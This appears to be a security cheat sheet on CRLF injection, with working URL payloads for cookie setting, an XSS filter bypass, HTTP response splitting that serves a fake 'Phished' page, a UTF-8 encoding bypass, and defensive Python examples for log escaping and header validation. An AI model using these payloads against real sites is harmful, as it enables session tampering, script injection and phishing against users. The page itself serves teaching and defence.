# CRLF

## What is CRLF injection?

*CRLF injection* is a vulnerability that lets a malicious hacker inject carriage return (CR) and linefeed (LF) characters to change the way a web application works or to confuse its administrator. There are two main malicious uses for CRLF injections: *log poisoning* (also called *log injection, log splitting,* or *log forging)* and *HTTP response splitting*.

## Carriage Return Line Feed

> The term CRLF refers to Carriage Return (ASCII 13, \r) Line Feed (ASCII 10, \n). They're used to note the termination of a line; however, they are dealt with differently in today's popular operating systems. For example: in Windows both a CR and LF are required to note the end of a line, whereas in Linux/UNIX only a LF is required. In the HTTP protocol, the CR-LF sequence is always used to terminate a line.

> A CRLF Injection attack occurs when a user manages to submit a CRLF into an application. This is most commonly done by modifying an HTTP parameter or URL.

### Summary

* CRLF - Add a cookie
* CRLF - Add a cookie - XSS Bypass
* CRLF - Write HTML
* CRLF - Filter Bypass
* Labs
* References

### CRLF - Add a cookie

Requested page

```http
http://www.example.net/%0D%0ASet-Cookie:mycookie=myvalue
```

HTTP Response

```http
Connection: keep-alive
Content-Length: 178
Content-Type: text/html
Date: Mon, 09 May 2016 14:47:29 GMT
Location: https://www.example.net/[INJECTION STARTS HERE]
Set-Cookie: mycookie=myvalue
X-Frame-Options: SAMEORIGIN
X-Sucuri-ID: 15016
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
```

### CRLF - Add a cookie - XSS Bypass

Requested page

```http
http://example.com/%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a<svg%20onload=alert(document.domain)>%0d%0a0%0d%0a/%2f%2e%2e
```

HTTP Response

```http
HTTP/1.1 200 OK
Date: Tue, 20 Dec 2016 14:34:03 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 22907
Connection: close
X-Frame-Options: SAMEORIGIN
Last-Modified: Tue, 20 Dec 2016 11:50:50 GMT
ETag: "842fe-597b-54415a5c97a80"
Vary: Accept-Encoding
X-UA-Compatible: IE=edge
Server: NetDNA-cache/2.2
Link: <https://example.com/[INJECTION STARTS HERE]
Content-Length:35
X-XSS-Protection:0

23
<svg onload=alert(document.domain)>
0
```

### CRLF - Write HTML

Requested page

```http
http://www.example.net/index.php?lang=en%0D%0AContent-Length%3A%200%0A%20%0AHTTP/1.1%20200%20OK%0AContent-Type%3A%20text/html%0ALast-Modified%3A%20Mon%2C%2027%20Oct%202060%2014%3A50%3A18%20GMT%0AContent-Length%3A%2034%0A%20%0A%3Chtml%3EYou%20have%20been%20Phished%3C/html%3E
```

HTTP response

```http
Set-Cookie:en
Content-Length: 0

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Mon, 27 Oct 2060 14:50:18 GMT
Content-Length: 34

<html>You have been Phished</html>
```

### CRLF - Filter Bypass

Using UTF-8 encoding

```http
%E5%98%8A%E5%98%8Dcontent-type:text/html%E5%98%8A%E5%98%8Dlocation:%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%BCsvg/onload=alert%28innerHTML%28%29%E5%98%BE
```

Reminder:

* %E5%98%8A = %0A = \u560a
* %E5%98%8D = %0D = \u560d
* %E5%98%BE = %3E = \u563e (>)
* %E5%98%BC = %3C = \u563c (<)

## What is log poisoning?

In a log poisoning attack based on CRLF injection, a malicious hacker injects CRLF characters into web server log files to confuse both automatic log analysis systems and system administrators browsing the logs manually.
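The defensive counterpart of log poisoning is to make sure user-controlled input can never start a new log line. The following added example (not code from the original page) escapes every control character, including CR and LF, before a value is written to the log, and shows with a constructed sample that a forged "second entry" collapses back into a single line:

```python
"""Added example (not part of the original page): neutralising CRLF in log
entries so that user-controlled input cannot forge extra log lines."""
import re

# Any C0 control character (this covers CR 0x0D and LF 0x0A) plus DEL.
_CONTROL = re.compile(r"[\x00-\x1f\x7f]")


def escape_for_log(value: str) -> str:
    """Replace control characters with visible escapes (\\r, \\n, \\t, \\xNN)
    so the logged value always stays on one physical line."""
    def repl(match: "re.Match[str]") -> str:
        ch = match.group(0)
        return {"\r": "\\r", "\n": "\\n", "\t": "\\t"}.get(ch, "\\x%02x" % ord(ch))
    return _CONTROL.sub(repl, value)


def log_line(remote_addr: str, user: str, message: str) -> str:
    """Build one log line; every user-controlled field goes through escape_for_log."""
    return "%s user=%s msg=%s" % (remote_addr, escape_for_log(user), escape_for_log(message))


def count_lines(log_text: str) -> int:
    """How many log lines a reader (or a log parser) would see."""
    return len(log_text.splitlines())


# Constructed sample (not from the page): the username field carries an
# embedded CRLF followed by a fake "admin logged in" entry.
FORGED_USER = "guest\r\n10.0.0.1 user=admin msg=login ok"

if __name__ == "__main__":
    naive = "10.0.0.5 user=%s msg=login failed" % FORGED_USER   # raw concatenation
    safe = log_line("10.0.0.5", FORGED_USER, "login failed")
    print("naive lines:", count_lines(naive))   # the forged entry shows up as its own line
    print("safe lines: ", count_lines(safe))    # still one line
    print(safe)
```

Escaping at write time (rather than trying to spot forged entries afterwards) is the reliable fix: the `\r\n` survives in the text, visibly, so an analyst can still see that someone tried it, but no log parser will treat it as a line break.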

## CRLF Injection Example

* `http://www.example.com/example.php?id=` – starting a valid request to a page with a CRLF injection vulnerability.
* `%0d%0aContent-Length:%200` – a fake HTTP response header of `Content-Length: 0`. This causes the web browser to treat this response as terminated and start parsing the next response.
* `%0d%0a%0d%0aHTTP/1.1%20200%20OK` – the injected new response begins here with a double CRLF sequence followed by `HTTP/1.1 200 OK`.
* `%0d%0aContent-Type:%20text/html` – another fake HTTP response header: `Content-Type: text/html`. This is required for the browser to treat this data as HTML content.
* `%0d%0aContent-Length:%2025` – yet another fake HTTP response header: `Content-Length: 25`. This instructs the browser to parse only the next 25 bytes and discard any remaining data as junk, causing it to ignore the legitimate HTTP content sent by the web server.
* `%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E` – a double CRLF sequence signals that the headers are over and the response body starts. The injected page content is `<script>alert(1)</script>`, which causes the user's browser to display an alert instead of the actual *example.php* page.
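The breakdown above and the filter-bypass section both come down to one root cause: a decoded request value is pasted into a response header. The following added example (not code from the original page) shows a minimal vulnerable redirect builder next to its hardened form. The hardening is a whitelist on the header value, allowing only the visible ASCII range, space and tab that RFC 7230 permits in a field value, so it rejects raw CR/LF and also code points such as U+560A / U+560D, whose encodings have been used to smuggle CRLF past a blacklist. The handler names and the payload strings are constructed for the example:

```python
"""Added example (not part of the original page): a response builder that
concatenates user input into the Location header, beside the hardened version
that refuses values capable of splitting the response."""
from urllib.parse import unquote


def header_value_is_safe(value: str) -> bool:
    """Whitelist: visible ASCII (0x21-0x7E), SP and HTAB only.
    Everything else, including CR, LF and non-ASCII code points, is rejected."""
    return all(ch in (" ", "\t") or 0x21 <= ord(ch) <= 0x7E for ch in value)


def build_response_vulnerable(lang: str) -> bytes:
    """Vulnerable: the already-decoded parameter lands straight in a header."""
    headers = "HTTP/1.1 302 Found\r\nLocation: /index.php?lang=" + lang + "\r\n\r\n"
    return headers.encode("utf-8")


def build_response_hardened(lang: str) -> bytes:
    """Hardened: reject the request instead of emitting an unsafe header."""
    if not header_value_is_safe(lang):
        return b"HTTP/1.1 400 Bad Request\r\nContent-Length: 0\r\n\r\n"
    return build_response_vulnerable(lang)


def count_responses(raw: bytes) -> int:
    """Number of status lines in the bytes; more than one means the response was split."""
    return raw.count(b"HTTP/1.1 ")


# Constructed payload in the shape the page dissects above (plain percent-encoded CRLF).
SPLIT_PAYLOAD = ("en%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK"
                 "%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025"
                 "%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E")
# Constructed variant using the UTF-8 characters from the filter-bypass section.
UNICODE_PAYLOAD = "en%E5%98%8A%E5%98%8DSet-Cookie:%20x=y"

if __name__ == "__main__":
    for name, payload in (("benign", "en"), ("crlf", SPLIT_PAYLOAD), ("unicode", UNICODE_PAYLOAD)):
        decoded = unquote(payload)
        print(name, "safe:", header_value_is_safe(decoded),
              "responses (vulnerable):", count_responses(build_response_vulnerable(decoded)),
              "responses (hardened):", count_responses(build_response_hardened(decoded)))
```

A blacklist that only strips `\r` and `\n` would pass the `UNICODE_PAYLOAD` value untouched, and whether it later turns into a real CRLF depends on how the server library narrows Unicode to bytes; the whitelist above does not have to know that, which is why it is the better check. In practice you would not write headers by hand at all but rely on a framework that already validates field values and raises on CR/LF.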

### Labs

* <https://portswigger.net/web-security/request-smuggling/advanced/lab-request-smuggling-h2-request-splitting-via-crlf-injection>

### References

* <https://salmonsec.com/cheatsheets/exploitation/crlf_injection>
* <https://www.owasp.org/index.php/CRLF_Injection>
* <https://vulners.com/hackerone/H1:192749>
